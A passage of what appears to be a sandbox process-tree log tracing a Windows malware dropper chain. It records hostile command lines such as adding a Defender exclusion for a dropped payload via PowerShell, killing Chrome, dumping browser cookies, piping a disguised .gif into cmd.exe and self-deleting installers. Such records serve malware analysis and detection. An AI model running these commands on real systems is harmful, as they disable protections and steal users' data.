        C:\Users\Admin\AppData\Local\Temp\QYPECRCKTX\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\QYPECRCKTX\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 104
        9⤵
        
        PID:5800
        
        C:\Users\Admin\AppData\Local\Temp\QYPECRCKTX\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\QYPECRCKTX\multitimer.exe" 1 3.1617513547.60694c4b3e9d0 104
        10⤵
        
        PID:6908
        
        C:\Users\Admin\AppData\Local\Temp\QYPECRCKTX\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\QYPECRCKTX\multitimer.exe" 2 3.1617513547.60694c4b3e9d0
        11⤵
        
        PID:10592
        
        C:\Users\Admin\AppData\Local\Temp\DVBWMKZ55O\setups.exe
        
        "C:\Users\Admin\AppData\Local\Temp\DVBWMKZ55O\setups.exe" ll
        9⤵
        
        PID:9012
        
        C:\Users\Admin\AppData\Local\Temp\is-QNQGA.tmp\setups.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-QNQGA.tmp\setups.tmp" /SL5="$306D8,635399,250368,C:\Users\Admin\AppData\Local\Temp\DVBWMKZ55O\setups.exe" ll
        10⤵
        
        PID:8372
- - C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe
    "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"
    3⤵
    PID:6184
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Program Files\javcse\install.vbs"
      4⤵
      PID:5064
    - - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" "C:\Program Files\javcse\install.dll",install
        5⤵
        
        PID:3492
- - C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe
    "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"
    3⤵
    PID:6268
- - C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe
    "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"
    3⤵
    PID:6344
  - - C:\Users\Admin\AppData\Local\Temp\LU65KIDMW3\multitimer.exe
      "C:\Users\Admin\AppData\Local\Temp\LU65KIDMW3\multitimer.exe" 0 306065bb10421b26.04333812 0 103
      4⤵
      PID:6524
    - - C:\Users\Admin\AppData\Local\Temp\LU65KIDMW3\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LU65KIDMW3\multitimer.exe" 1 3.1617513256.60694b287366f 103
        5⤵
        
        PID:4260
      - C:\Users\Admin\AppData\Local\Temp\LU65KIDMW3\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LU65KIDMW3\multitimer.exe" 2 3.1617513256.60694b287366f
        6⤵
        
        PID:4336
        
        C:\Users\Admin\AppData\Local\Temp\lpdkkpj2ieh\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\lpdkkpj2ieh\Setup3310.exe" /Verysilent /subid=577
        7⤵
        
        PID:1948
        
        C:\Users\Admin\AppData\Local\Temp\is-13A46.tmp\Setup3310.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-13A46.tmp\Setup3310.tmp" /SL5="$504FC,138429,56832,C:\Users\Admin\AppData\Local\Temp\lpdkkpj2ieh\Setup3310.exe" /Verysilent /subid=577
        8⤵
        
        PID:7300
        
        C:\Users\Admin\AppData\Local\Temp\is-4HJT9.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-4HJT9.tmp\Setup.exe" /Verysilent
        9⤵
        
        PID:7224
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"
        10⤵
        
        PID:6788
        
        C:\Users\Admin\AppData\Local\Temp\is-M2OV6.tmp\lylal220.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-M2OV6.tmp\lylal220.tmp" /SL5="$50528,491750,408064,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"
        11⤵
        
        PID:5804
        
        C:\Users\Admin\AppData\Local\Temp\is-CC7D7.tmp\Microsoft.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-CC7D7.tmp\Microsoft.exe" /S /UID=lylal220
        12⤵
        
        PID:4820
        
        C:\Users\Admin\AppData\Local\Temp\6c-0deb3-0eb-bb8b6-715c1d9e8c586\ZHifashydexae.exe
        
        "C:\Users\Admin\AppData\Local\Temp\6c-0deb3-0eb-bb8b6-715c1d9e8c586\ZHifashydexae.exe"
        13⤵
        
        PID:1224
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vozbtufc.t40\md6_6ydj.exe & exit
        14⤵
        
        PID:3168
        
        C:\Users\Admin\AppData\Local\Temp\vozbtufc.t40\md6_6ydj.exe
        
        C:\Users\Admin\AppData\Local\Temp\vozbtufc.t40\md6_6ydj.exe
        15⤵
        
        PID:7208
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0eywq5pd.qld\askinstall31.exe & exit
        14⤵
        
        PID:1000
        
        C:\Users\Admin\AppData\Local\Temp\0eywq5pd.qld\askinstall31.exe
        
        C:\Users\Admin\AppData\Local\Temp\0eywq5pd.qld\askinstall31.exe
        15⤵
        
        PID:5424
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        16⤵
        
        PID:7724
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        17⤵
        Kills process with taskkill
        
        PID:8512
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pa5vg4fp.yvt\toolspab1.exe & exit
        14⤵
        
        PID:8872
        
        C:\Users\Admin\AppData\Local\Temp\pa5vg4fp.yvt\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\pa5vg4fp.yvt\toolspab1.exe
        15⤵
        
        PID:9088
        
        C:\Users\Admin\AppData\Local\Temp\pa5vg4fp.yvt\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\pa5vg4fp.yvt\toolspab1.exe
        16⤵
        
        PID:8732
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dsaqsfaz.kk3\GcleanerWW.exe /mixone & exit
        14⤵
        
        PID:4732
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vvfdearc.3ld\setup_10.2_mix.exe & exit
        14⤵
        
        PID:10060
        
        C:\Users\Admin\AppData\Local\Temp\vvfdearc.3ld\setup_10.2_mix.exe
        
        C:\Users\Admin\AppData\Local\Temp\vvfdearc.3ld\setup_10.2_mix.exe
        15⤵
        
        PID:10068
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mxoxm4g1.ero\file.exe & exit
        14⤵
        
        PID:9792
        
        C:\Users\Admin\AppData\Local\Temp\mxoxm4g1.ero\file.exe
        
        C:\Users\Admin\AppData\Local\Temp\mxoxm4g1.ero\file.exe
        15⤵
        
        PID:10776
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\e2r5wihv.x2n\app.exe /8-2222 & exit
        14⤵
        
        PID:8632
        
        C:\Users\Admin\AppData\Local\Temp\e2r5wihv.x2n\app.exe
        
        C:\Users\Admin\AppData\Local\Temp\e2r5wihv.x2n\app.exe /8-2222
        15⤵
        
        PID:3876
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"
        10⤵
        
        PID:4240
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Program Files\javcse\install.vbs"
        11⤵
        
        PID:2664
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" "C:\Program Files\javcse\install.dll",install
        12⤵
        
        PID:8020
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"
        10⤵
        
        PID:7332
        
        C:\Users\Admin\AppData\Local\Temp\LJQ047D2IJ\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LJQ047D2IJ\multitimer.exe" 0 306065bb10421b26.04333812 0 103
        11⤵
        
        PID:6188
        
        C:\Users\Admin\AppData\Local\Temp\LJQ047D2IJ\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LJQ047D2IJ\multitimer.exe" 1 3.1617513397.60694bb51a001 103
        12⤵
        
        PID:5912
        
        C:\Users\Admin\AppData\Local\Temp\LJQ047D2IJ\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LJQ047D2IJ\multitimer.exe" 2 3.1617513397.60694bb51a001
        13⤵
        
        PID:7280
        
        C:\Users\Admin\AppData\Local\Temp\ik2cxvx1xzp\vict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ik2cxvx1xzp\vict.exe" /VERYSILENT /id=535
        14⤵
        
        PID:8700
        
        C:\Users\Admin\AppData\Local\Temp\is-LN55F.tmp\vict.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-LN55F.tmp\vict.tmp" /SL5="$A0316,870426,780800,C:\Users\Admin\AppData\Local\Temp\ik2cxvx1xzp\vict.exe" /VERYSILENT /id=535
        15⤵
        
        PID:8688
        
        C:\Users\Admin\AppData\Local\Temp\is-DB94H.tmp\win1host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-DB94H.tmp\win1host.exe" 535
        16⤵
        
        PID:5240
        
        C:\Users\Admin\AppData\Local\Temp\quw04zkoi0c\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\quw04zkoi0c\Setup3310.exe" /Verysilent /subid=577
        14⤵
        
        PID:8312
        
        C:\Users\Admin\AppData\Local\Temp\is-O2BRS.tmp\Setup3310.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-O2BRS.tmp\Setup3310.tmp" /SL5="$1102E4,138429,56832,C:\Users\Admin\AppData\Local\Temp\quw04zkoi0c\Setup3310.exe" /Verysilent /subid=577
        15⤵
        
        PID:9188
        
        C:\Users\Admin\AppData\Local\Temp\is-5JH7K.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-5JH7K.tmp\Setup.exe" /Verysilent
        16⤵
        
        PID:8288
        
        C:\Users\Admin\AppData\Local\Temp\2tmfeya34mk\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2tmfeya34mk\app.exe" /8-23
        14⤵
        
        PID:9032
        
        C:\Users\Admin\AppData\Local\Temp\vuh5wsgzmdc\cpyrix.exe
        
        "C:\Users\Admin\AppData\Local\Temp\vuh5wsgzmdc\cpyrix.exe" /VERYSILENT
        14⤵
        
        PID:4444
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        C:\Users\Admin\AppData\Roaming\1.exe
        15⤵
        
        PID:8664
        
        C:\Users\Admin\AppData\Local\Temp\906ffa80-40e1-400a-92c1-b9415c0d1e9f\AdvancedRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\906ffa80-40e1-400a-92c1-b9415c0d1e9f\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\906ffa80-40e1-400a-92c1-b9415c0d1e9f\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
        16⤵
        
        PID:6048
        
        C:\Users\Admin\AppData\Local\Temp\906ffa80-40e1-400a-92c1-b9415c0d1e9f\AdvancedRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\906ffa80-40e1-400a-92c1-b9415c0d1e9f\AdvancedRun.exe" /SpecialRun 4101d8 6048
        17⤵
        
        PID:9480
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\1.exe" -Force
        16⤵
        
        PID:9776
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c timeout 1
        16⤵
        
        PID:9220
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 1
        17⤵
        Delays execution with timeout.exe
        
        PID:7232
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        "C:\Users\Admin\AppData\Roaming\1.exe"
        16⤵
        
        PID:10268
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        "C:\Users\Admin\AppData\Roaming\1.exe"
        16⤵
        
        PID:10484
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 8664 -s 1516
        16⤵
        Program crash
        
        PID:10628
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        C:\Users\Admin\AppData\Roaming\2.exe
        15⤵
        
        PID:8128
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        "{path}"
        16⤵
        
        PID:8876
        
        C:\Users\Admin\AppData\Local\Temp\c3yrl4zjzsq\4lwjtl34oun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\c3yrl4zjzsq\4lwjtl34oun.exe" /ustwo INSTALL
        14⤵
        
        PID:8252
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "4lwjtl34oun.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\c3yrl4zjzsq\4lwjtl34oun.exe" & exit
        15⤵
        
        PID:8556
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "4lwjtl34oun.exe" /f
        16⤵
        Kills process with taskkill
        
        PID:208
        
        C:\Users\Admin\AppData\Local\Temp\SJ4VXRRP5F\setups.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SJ4VXRRP5F\setups.exe" ll
        11⤵
        
        PID:4768
        
        C:\Users\Admin\AppData\Local\Temp\is-TR5DB.tmp\setups.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-TR5DB.tmp\setups.tmp" /SL5="$40570,635399,250368,C:\Users\Admin\AppData\Local\Temp\SJ4VXRRP5F\setups.exe" ll
        12⤵
        
        PID:1624
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\f49msXwaGcZo.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\f49msXwaGcZo.exe"
        10⤵
        
        PID:3248
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        11⤵
        
        PID:4640
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"
        10⤵
        
        PID:7628
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"
        10⤵
        
        PID:8188
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"
        11⤵
        
        PID:4080
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
        12⤵
        
        PID:7948
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"
        10⤵
        
        PID:7200
        
        C:\Users\Admin\AppData\Local\Temp\is-9G4S1.tmp\LabPicV3.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-9G4S1.tmp\LabPicV3.tmp" /SL5="$40584,239334,155648,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"
        11⤵
        
        PID:4520
        
        C:\Users\Admin\AppData\Local\Temp\is-2HSAK.tmp\ppppppfy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-2HSAK.tmp\ppppppfy.exe" /S /UID=lab214
        12⤵
        
        PID:7952
        
        C:\Users\Admin\AppData\Local\Temp\24-78dc7-621-4d291-a25ae48ba5173\Pycufymape.exe
        
        "C:\Users\Admin\AppData\Local\Temp\24-78dc7-621-4d291-a25ae48ba5173\Pycufymape.exe"
        13⤵
        
        PID:5276
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tcsvzjky.4ve\md6_6ydj.exe & exit
        14⤵
        
        PID:3780
        
        C:\Users\Admin\AppData\Local\Temp\tcsvzjky.4ve\md6_6ydj.exe
        
        C:\Users\Admin\AppData\Local\Temp\tcsvzjky.4ve\md6_6ydj.exe
        15⤵
        
        PID:8520
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xwrmpurk.0ri\askinstall31.exe & exit
        14⤵
        
        PID:8288
        
        C:\Users\Admin\AppData\Local\Temp\xwrmpurk.0ri\askinstall31.exe
        
        C:\Users\Admin\AppData\Local\Temp\xwrmpurk.0ri\askinstall31.exe
        15⤵
        
        PID:3044
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\sretyazh.o3z\toolspab1.exe & exit
        14⤵
        
        PID:8740
        
        C:\Users\Admin\AppData\Local\Temp\sretyazh.o3z\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\sretyazh.o3z\toolspab1.exe
        15⤵
        
        PID:9008
        
        C:\Users\Admin\AppData\Local\Temp\sretyazh.o3z\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\sretyazh.o3z\toolspab1.exe
        16⤵
        
        PID:5124
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lutwr2j2.qx2\GcleanerWW.exe /mixone & exit
        14⤵
        
        PID:8456
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5j1ialrc.zwy\file.exe & exit
        14⤵
        
        PID:9456
        
        C:\Users\Admin\AppData\Local\Temp\5j1ialrc.zwy\file.exe
        
        C:\Users\Admin\AppData\Local\Temp\5j1ialrc.zwy\file.exe
        15⤵
        
        PID:3604
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX4\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX4\Setup.exe"
        16⤵
        
        PID:4512
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pjlzqbk2.hy4\setup_10.2_mix.exe & exit
        14⤵
        
        PID:10116
        
        C:\Users\Admin\AppData\Local\Temp\pjlzqbk2.hy4\setup_10.2_mix.exe
        
        C:\Users\Admin\AppData\Local\Temp\pjlzqbk2.hy4\setup_10.2_mix.exe
        15⤵
        
        PID:10196
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Microsoft\App\app.bat" "
        16⤵
        
        PID:2488
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\i2fofvpy.ku4\app.exe /8-2222 & exit
        14⤵
        
        PID:1692
        
        C:\Users\Admin\AppData\Local\Temp\i2fofvpy.ku4\app.exe
        
        C:\Users\Admin\AppData\Local\Temp\i2fofvpy.ku4\app.exe /8-2222
        15⤵
        
        PID:11256
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bvikxodm.pid\Four.exe & exit
        14⤵
        
        PID:7256
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"
        10⤵
        
        PID:4280
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"
        10⤵
        
        PID:6240
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"
        10⤵
        
        PID:6032
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        11⤵
        
        PID:5220
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        11⤵
        
        PID:5068
        
        C:\Users\Admin\AppData\Local\Temp\qlrmnk14nn2\cpyrix.exe
        
        "C:\Users\Admin\AppData\Local\Temp\qlrmnk14nn2\cpyrix.exe" /VERYSILENT
        7⤵
        
        PID:7344
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        C:\Users\Admin\AppData\Roaming\1.exe
        8⤵
        
        PID:4040
        
        C:\Users\Admin\AppData\Local\Temp\a8b8c3ee-23ed-4f32-a449-d388b99b1557\AdvancedRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a8b8c3ee-23ed-4f32-a449-d388b99b1557\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\a8b8c3ee-23ed-4f32-a449-d388b99b1557\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
        9⤵
        
        PID:4368
        
        C:\Users\Admin\AppData\Local\Temp\a8b8c3ee-23ed-4f32-a449-d388b99b1557\AdvancedRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a8b8c3ee-23ed-4f32-a449-d388b99b1557\AdvancedRun.exe" /SpecialRun 4101d8 4368
        10⤵
        
        PID:7420
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\1.exe" -Force
        9⤵
        
        PID:7004
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c timeout 1
        9⤵
        
        PID:7252
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 1
        10⤵
        Delays execution with timeout.exe
        
        PID:7968
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        "C:\Users\Admin\AppData\Roaming\1.exe"
        9⤵
        
        PID:7432
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4040 -s 1432
        9⤵
        Program crash
        
        PID:4212
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        C:\Users\Admin\AppData\Roaming\2.exe
        8⤵
        
        PID:7880
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        "{path}"
        9⤵
        Checks computer location settings
        Checks whether UAC is enabled
        Drops file in Windows directory
        Modifies Control Panel
        Modifies Internet Explorer settings
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:4104
        
        C:\Users\Admin\AppData\Local\Temp\5fzyclo0yrq\vict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\5fzyclo0yrq\vict.exe" /VERYSILENT /id=535
        7⤵
        
        PID:7228
        
        C:\Users\Admin\AppData\Local\Temp\is-2B39D.tmp\vict.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-2B39D.tmp\vict.tmp" /SL5="$404E8,870426,780800,C:\Users\Admin\AppData\Local\Temp\5fzyclo0yrq\vict.exe" /VERYSILENT /id=535
        8⤵
        
        PID:7492
        
        C:\Users\Admin\AppData\Local\Temp\is-98CLE.tmp\win1host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-98CLE.tmp\win1host.exe" 535
        9⤵
        
        PID:6544
        
        C:\Users\Admin\AppData\Local\Temp\ifcZ4R15C.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ifcZ4R15C.exe"
        10⤵
        
        PID:7436
        
        C:\Windows\SysWOW64\at.exe
        
        "C:\Windows\System32\at.exe"
        11⤵
        
        PID:8092
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Marito.gif
        11⤵
        
        PID:2512
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe
        12⤵
        
        PID:6508
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6544 -s 568
        10⤵
        Program crash
        
        PID:9708
        
        C:\Users\Admin\AppData\Local\Temp\crm0l2kkgst\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\crm0l2kkgst\app.exe" /8-23
        7⤵
        
        PID:7188
        
        C:\Users\Admin\AppData\Local\Temp\djeo5mjax33\vpn.exe
        
        "C:\Users\Admin\AppData\Local\Temp\djeo5mjax33\vpn.exe" /silent /subid=482
        7⤵
        
        PID:5076
        
        C:\Users\Admin\AppData\Local\Temp\bttpznqpwir\zyiulaqiret.exe
        
        "C:\Users\Admin\AppData\Local\Temp\bttpznqpwir\zyiulaqiret.exe" /ustwo INSTALL
        7⤵
        
        PID:7544
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "zyiulaqiret.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\bttpznqpwir\zyiulaqiret.exe" & exit
        8⤵
        
        PID:4536
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "zyiulaqiret.exe" /f
        9⤵
        Kills process with taskkill
        
        PID:6492
  - - C:\Users\Admin\AppData\Local\Temp\6NHHSARQMM\setups.exe
      "C:\Users\Admin\AppData\Local\Temp\6NHHSARQMM\setups.exe" ll
      4⤵
      PID:4980
    - - C:\Users\Admin\AppData\Local\Temp\is-5EQE7.tmp\setups.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-5EQE7.tmp\setups.tmp" /SL5="$3051A,635399,250368,C:\Users\Admin\AppData\Local\Temp\6NHHSARQMM\setups.exe" ll
        5⤵
        
        PID:6340
- - C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe
    "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"
    3⤵
    PID:6220
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"
      4⤵
      PID:7016
    - - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
        5⤵
        
        PID:3920
- - C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\f49msXwaGcZo.exe
    "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\f49msXwaGcZo.exe"
    3⤵
    PID:6384
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
      4⤵
      PID:1712

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:5944

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:5416

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:5480
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 6273EA38FCAB894677F8A950EF6C51F7 C
  2⤵
  PID:5568
- C:\Windows\syswow64\MsiExec.exe
